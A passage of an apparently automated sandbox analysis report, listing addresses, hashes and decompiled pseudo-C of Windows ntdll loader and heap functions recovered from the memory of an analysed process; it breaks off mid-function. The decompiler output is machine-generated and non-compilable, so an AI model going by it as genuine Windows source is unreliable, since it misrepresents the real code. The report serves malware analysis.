                                                    0x00b41d4c
                                                    0x00b41d61
                                                    0x00b41d67
                                                    0x00b41d68
                                                    0x00b41d6e
                                                    0x00b41d79
                                                    0x00b41d98
                                                    0x00b41d99
                                                    0x00b41d7b
                                                    0x00b41d90
                                                    0x00b41d95
                                                    0x00b41daa
                                                    0x00b41db0
                                                    0x00b41db1
                                                    0x00b41db7
                                                    0x00b41dc2
                                                    0x00b41de1
                                                    0x00b41de2
                                                    0x00b41dc4
                                                    0x00b41dd9
                                                    0x00b41dde
                                                    0x00b41df3
                                                    0x00b41df9
                                                    0x00b41dfa
                                                    0x00b41e00
                                                    0x00b41e0a
                                                    0x00b41e13
                                                    0x00b41e32
                                                    0x00b41e33
                                                    0x00b41e15
                                                    0x00b41e2a
                                                    0x00b41e2f
                                                    0x00b41e39
                                                    0x00b41e4a
                                                    0x00b41e02
                                                    0x00b41e02
                                                    0x00b41e08
                                                    0x00000000
                                                    0x00000000
                                                    0x00b41e08
                                                    0x00b41e5b
                                                    0x00b41e7a
                                                    0x00b41e7b
                                                    0x00b41e5d
                                                    0x00b41e72
                                                    0x00b41e77
                                                    0x00b41e95

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                    • API String ID: 0-2897834094
                                                    • Opcode ID: 4ccc836f6aa1507ed6b36c5a4fcfceb3547c521d8449efb0a8badc787b8b3904
                                                    • Instruction ID: d192b237483c8128c2db67c16db67416b18cca06a5af8900795fdee206991490
                                                    • Opcode Fuzzy Hash: 4ccc836f6aa1507ed6b36c5a4fcfceb3547c521d8449efb0a8badc787b8b3904
                                                    • Instruction Fuzzy Hash: 9F618036D65544DFC311EB88DDD992073E4EB08F20B19C9FAF40D6F262D6649DC0AB1A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00A93D34 Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 96%
                                                    			E00A93D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E00A91B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E00A91B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E00A91B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E00A91B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E00A91B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L00AA4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E00ACF3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E00AD1370(_t276, 0xa64e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E00ACBB40(0,  &_v68, _t170);
									if(L00A943C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E00ACBB40(_t257,  &_v68, _t243);
								if(L00A943C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E00AD1370(_t278, 0xa64e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L00AA4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E00ACF3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E00AD1370(_v16, 0xa64e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E00ACBB40(_t262,  &_v68, _t244);
								if(L00A943C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E00AD1370(_t282, 0xa64e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E00ACBB40(_t262,  &_v68, _t201);
							if(L00A943C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L00AA4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E00ACF3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E00AD1370(_t280, 0xa64e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E00ACBB40(_t267,  &_v68, _t245);
							if(L00A943C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E00AD1370(_t284, 0xa64e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E00ACBB40(_t267,  &_v68, _t224);
						if(L00A943C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                                    0x00a93d3c
                                                    0x00a93d42
                                                    0x00a93d44
                                                    0x00a93d46
                                                    0x00a93d49
                                                    0x00a93d4c
                                                    0x00a93d4f
                                                    0x00a93d52
                                                    0x00a93d55
                                                    0x00a93d58
                                                    0x00a93d5b
                                                    0x00a93d5f
                                                    0x00a93d61
                                                    0x00a93d66
                                                    0x00ae8213
                                                    0x00ae8218
                                                    0x00a94085
                                                    0x00a94088
                                                    0x00a9408e
                                                    0x00a94094
                                                    0x00a9409a
                                                    0x00a940a0
                                                    0x00a940a6
                                                    0x00a940a9
                                                    0x00a940af
                                                    0x00a940b6
                                                    0x00a940bd
                                                    0x00a940bd
                                                    0x00a93d83
                                                    0x00ae821f
                                                    0x00ae8229
                                                    0x00ae8238
                                                    0x00ae8238
                                                    0x00ae823d
                                                    0x00ae823d
                                                    0x00a93da0
                                                    0x00a93daf
                                                    0x00a93db5
                                                    0x00a93dba
                                                    0x00a93dba
                                                    0x00a93dd4
                                                    0x00a93e94
                                                    0x00a93eab
                                                    0x00a93f6d
                                                    0x00a93f84
                                                    0x00a9406b
                                                    0x00a9406b
                                                    0x00a9406e
                                                    0x00a9406e
                                                    0x00a94070
                                                    0x00a94074
                                                    0x00ae8351
                                                    0x00ae8351
                                                    0x00a9407a
                                                    0x00a9407f
                                                    0x00ae835d
                                                    0x00ae8370
                                                    0x00ae8377
                                                    0x00ae8379
                                                    0x00ae837c
                                                    0x00ae837c
                                                    0x00ae835d
                                                    0x00000000
                                                    0x00a9407f
                                                    0x00a93f8a
                                                    0x00a93f8d
                                                    0x00a93f90
                                                    0x00a93f95
                                                    0x00ae830d
                                                    0x00ae830f
                                                    0x00a93f9b
                                                    0x00a93fac
                                                    0x00a93fae
                                                    0x00a93fb1
                                                    0x00a93fb1
                                                    0x00a93fb6
                                                    0x00ae8317
                                                    0x00ae831a
                                                    0x00000000
                                                    0x00a93fbc
                                                    0x00a93fc1
                                                    0x00a93fc9
                                                    0x00a93fd7
                                                    0x00a93fda
                                                    0x00a93fdd
                                                    0x00a94021
                                                    0x00a94021
                                                    0x00a94029
                                                    0x00a94030
                                                    0x00a94044
                                                    0x00a94046
                                                    0x00a94046
                                                    0x00a94044
                                                    0x00a94049
                                                    0x00ae8327
                                                    0x00ae8334
                                                    0x00ae8339
                                                    0x00ae833c
                                                    0x00a9404f
                                                    0x00a9404f
                                                    0x00a9404f
                                                    0x00a94051
                                                    0x00a94056
                                                    0x00a94063
                                                    0x00a94063
                                                    0x00a94068
                                                    0x00000000
                                                    0x00a94068
                                                    0x00a93fdf
                                                    0x00a93fe2
                                                    0x00a93fe4
                                                    0x00a93fe7
                                                    0x00a93fef
                                                    0x00a94003
                                                    0x00a94005
                                                    0x00a94005
                                                    0x00a9400c
                                                    0x00a94013
                                                    0x00a94016
                                                    0x00a94017
                                                    0x00a9401b
                                                    0x00a9401e
                                                    0x00000000
                                                    0x00a9401e
                                                    0x00a93fb6
                                                    0x00a93eb1
                                                    0x00a93eb4
                                                    0x00a93eb7
                                                    0x00a93ebc
                                                    0x00ae82a9
                                                    0x00ae82ab
                                                    0x00a93ec2
                                                    0x00a93ed3
                                                    0x00a93ed5
                                                    0x00a93ed8
                                                    0x00a93ed8
                                                    0x00a93edd
                                                    0x00ae82b3
                                                    0x00ae82b6
                                                    0x00000000
                                                    0x00a93ee3
                                                    0x00a93ee8
                                                    0x00a93eed
                                                    0x00a93ef0
                                                    0x00a93ef3
                                                    0x00a93f02
                                                    0x00a93f05
                                                    0x00a93f08
                                                    0x00ae82c0
                                                    0x00ae82c3
                                                    0x00ae82c5
                                                    0x00ae82c8
                                                    0x00ae82d0
                                                    0x00ae82e4
                                                    0x00ae82e6
                                                    0x00ae82e6
                                                    0x00ae82ed
                                                    0x00ae82f4
                                                    0x00ae82f7
                                                    0x00ae82f8
                                                    0x00ae82fc
                                                    0x00ae82ff
                                                    0x00ae82ff
                                                    0x00a93f0e
                                                    0x00a93f11
                                                    0x00a93f16
                                                    0x00a93f1d
                                                    0x00a93f31
                                                    0x00ae8307
                                                    0x00ae8307
                                                    0x00a93f31
                                                    0x00a93f39
                                                    0x00a93f48
                                                    0x00a93f4d
                                                    0x00a93f50
                                                    0x00a93f50
                                                    0x00a93f53
                                                    0x00a93f58
                                                    0x00a93f65
                                                    0x00a93f65
                                                    0x00a93f6a
                                                    0x00000000
                                                    0x00a93f6a
                                                    0x00a93edd
                                                    0x00a93dda
                                                    0x00a93ddd
                                                    0x00a93de0
                                                    0x00a93de5
                                                    0x00ae8245
                                                    0x00a93deb
                                                    0x00a93df7
                                                    0x00a93dfc
                                                    0x00a93dfe
                                                    0x00a93e01
                                                    0x00a93e01
                                                    0x00a93e06
                                                    0x00ae824d
                                                    0x00ae824f
                                                    0x00ae8254
                                                    0x00000000
                                                    0x00a93e0c
                                                    0x00a93e11
                                                    0x00a93e16
                                                    0x00a93e19
                                                    0x00a93e29
                                                    0x00a93e2c
                                                    0x00a93e2f
                                                    0x00ae825c
                                                    0x00ae825f
                                                    0x00ae8261
                                                    0x00ae8264
                                                    0x00ae826c
                                                    0x00ae8280
                                                    0x00ae8282
                                                    0x00ae8282
                                                    0x00ae8289
                                                    0x00ae8290
                                                    0x00ae8293
                                                    0x00ae8294
                                                    0x00ae8298
                                                    0x00ae829b
                                                    0x00ae829b
                                                    0x00a93e35
                                                    0x00a93e38
                                                    0x00a93e3d
                                                    0x00a93e44
                                                    0x00a93e58
                                                    0x00ae82a3
                                                    0x00ae82a3
                                                    0x00a93e58
                                                    0x00a93e60
                                                    0x00a93e6f
                                                    0x00a93e74
                                                    0x00a93e77
                                                    0x00a93e77
                                                    0x00a93e7a
                                                    0x00a93e7f
                                                    0x00a93e8c
                                                    0x00a93e8c
                                                    0x00a93e91
                                                    0x00000000
                                                    0x00a93e91

                                                    Strings
                                                    • WindowsExcludedProcs, xrefs: 00A93D6F
                                                    • Kernel-MUI-Number-Allowed, xrefs: 00A93D8C
                                                    • Kernel-MUI-Language-SKU, xrefs: 00A93F70
                                                    • Kernel-MUI-Language-Allowed, xrefs: 00A93DC0
                                                    • Kernel-MUI-Language-Disallowed, xrefs: 00A93E97
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                    • API String ID: 0-258546922
                                                    • Opcode ID: aaa2e1a6187c3d83e589b70246ab81ca1c5da32a119e06d607cce1f72ab6ab4f
                                                    • Instruction ID: a9ce9e124fa62d6dad97a78197eec463ad6109f2325fbda31c4488c8fb2c90d9
                                                    • Opcode Fuzzy Hash: aaa2e1a6187c3d83e589b70246ab81ca1c5da32a119e06d607cce1f72ab6ab4f
                                                    • Instruction Fuzzy Hash: 21F12B72E00659ABCF11DF99C981EEEB7F9FF08750F15006AE505AB251D7359E01CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AB8E00 Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 44%
                                                    			E00AB8E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0xb7d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0xb78464; // 0x76690110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0xb75780 & 0x00000003) != 0) {
							E00B05510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0xb75780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E00ACB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0xb77984; // 0x632b98
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0xb78464; // 0x76690110
					 *0xb7b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E00AB9B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0xb75780 & 0x00000005) != 0) {
						_push(_t49);
						E00B05510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                                    0x00ab8e0f
                                                    0x00ab8e16
                                                    0x00ab8e19
                                                    0x00ab8e1b
                                                    0x00ab8e21
                                                    0x00ab8e7f
                                                    0x00ab8e85
                                                    0x00af9354
                                                    0x00af936c
                                                    0x00af9371
                                                    0x00af937b
                                                    0x00af9381
                                                    0x00af9381
                                                    0x00af937b
                                                    0x00ab8e9d
                                                    0x00ab8e9d
                                                    0x00ab8e29
                                                    0x00ab8e2c
                                                    0x00ab8e38
                                                    0x00ab8e3e
                                                    0x00ab8e43
                                                    0x00ab8eb5
                                                    0x00ab8eb9
                                                    0x00af92aa
                                                    0x00af92af
                                                    0x00af92e8
                                                    0x00af92e8
                                                    0x00af92af
                                                    0x00ab8eb9
                                                    0x00ab8e45
                                                    0x00ab8e53
                                                    0x00ab8e5b
                                                    0x00ab8e5f
                                                    0x00ab8e78
                                                    0x00ab8e78
                                                    0x00ab8e7d
                                                    0x00ab8ec3
                                                    0x00ab8ecd
                                                    0x00ab8ed2
                                                    0x00ab8ed2
                                                    0x00ab8ec5
                                                    0x00ab8ec5
                                                    0x00000000
                                                    0x00ab8e7d
                                                    0x00ab8e67
                                                    0x00ab8ea4
                                                    0x00af931a
                                                    0x00000000
                                                    0x00000000
                                                    0x00af9320
                                                    0x00ab8ea4
                                                    0x00ab8e70
                                                    0x00af9325
                                                    0x00af9340
                                                    0x00af9345
                                                    0x00af9345
                                                    0x00ab8e76
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000

                                                    Strings
                                                    • Querying the active activation context failed with status 0x%08lx, xrefs: 00AF9357
                                                    • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 00AF932A
                                                    • minkernel\ntdll\ldrsnap.c, xrefs: 00AF933B, 00AF9367
                                                    • LdrpFindDllActivationContext, xrefs: 00AF9331, 00AF935D
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                    • API String ID: 0-3779518884
                                                    • Opcode ID: cf96c288c4daa1f7b4ac6cb681aab9c464a2942e4118e67266178a100b6dcad4
                                                    • Instruction ID: cd0d620e8a7bb944ccbe14336bbc450ff96d3b09a1fe8d473c7ff5774ec73d8a
                                                    • Opcode Fuzzy Hash: cf96c288c4daa1f7b4ac6cb681aab9c464a2942e4118e67266178a100b6dcad4
                                                    • Instruction Fuzzy Hash: 18410931A00315AEDB35AB5CCC49BFAB6BCBB10744F094569E909571A3EF78ECC0C681
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00A98794 Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 83%
                                                    			E00A98794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E00A9934A() != 0) {
								_t159 = E00B0A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0xb75780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E00B05510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0xb75780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E00A9849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E00A98999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E00A98999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0xb75c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0xb75c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E00AA2280(_t92, 0xb786cc);
															_t94 = E00B59DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E00AB61A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0xb75c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E00A98A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0xb75c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0xb75c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E00ACF380(_t136, 0xa61184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E00AA2280(_t108, 0xb786cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
